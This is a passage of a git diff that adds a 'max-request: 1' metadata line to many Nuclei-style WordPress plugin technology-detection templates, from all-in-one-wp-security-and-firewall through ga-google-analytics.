a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: 